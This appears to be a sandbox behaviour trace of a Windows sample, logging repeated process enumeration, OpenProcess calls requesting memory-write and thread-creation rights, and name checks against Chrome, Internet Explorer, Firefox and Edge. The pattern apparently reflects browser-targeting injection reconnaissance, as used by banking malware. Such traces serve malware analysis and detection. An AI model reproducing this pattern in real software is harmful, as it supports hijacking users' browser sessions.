	[0224.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.352] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.353] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.353] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.354] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5a1c
	[0224.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.354] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.354] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.354] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.355] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.355] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.356] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5a20
	[0224.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.357] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0224.358] CloseHandle (hObject=0x4fd0) returned 1
	[0224.358] Sleep (dwMilliseconds=0x64) 
	[0224.457] GetCurrentProcessId () returned 0x110
	[0224.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0224.459] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0224.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0224.461] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0224.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5a24
	[0224.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.461] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.462] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.462] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.462] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.463] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5a28
	[0224.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.463] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.464] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.464] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.464] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0224.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5a2c
	[0224.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.465] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0224.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.466] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.466] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0224.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.466] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5a30
	[0224.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.467] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.468] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.468] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.468] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0224.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5a34
	[0224.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.470] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0224.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.470] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.471] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0224.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.471] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0224.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5a38
	[0224.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.472] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0224.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.472] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.473] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0224.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.473] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0224.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5a3c
	[0224.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.474] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0224.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.475] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.475] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0224.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.476] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.476] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0224.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5a40
	[0224.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.477] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.477] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.477] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.477] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5a44
	[0224.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.478] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.479] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.479] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.479] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5a48
	[0224.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.480] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.481] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.481] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.481] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5a4c
	[0224.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.482] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.483] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.483] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.483] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.483] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5a50
	[0224.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.484] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.485] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.486] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.486] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5a54
	[0224.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.487] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.487] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.488] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.488] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.488] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.489] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5a58
	[0224.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.489] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.490] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.490] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.490] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5a5c
	[0224.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.491] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.492] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.492] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.492] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0224.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a60
	[0224.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.493] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0224.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.494] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.494] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0224.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.494] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5a64
	[0224.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.495] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.496] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.496] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.496] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.497] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0224.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5a68
	[0224.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.497] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.498] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.498] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.498] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5a6c
	[0224.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.499] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0224.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.500] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.501] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.501] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.501] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5a70
	[0224.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.502] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.503] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.503] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.503] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5a74
	[0224.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.504] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.505] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.505] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.505] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0224.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5a78
	[0224.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
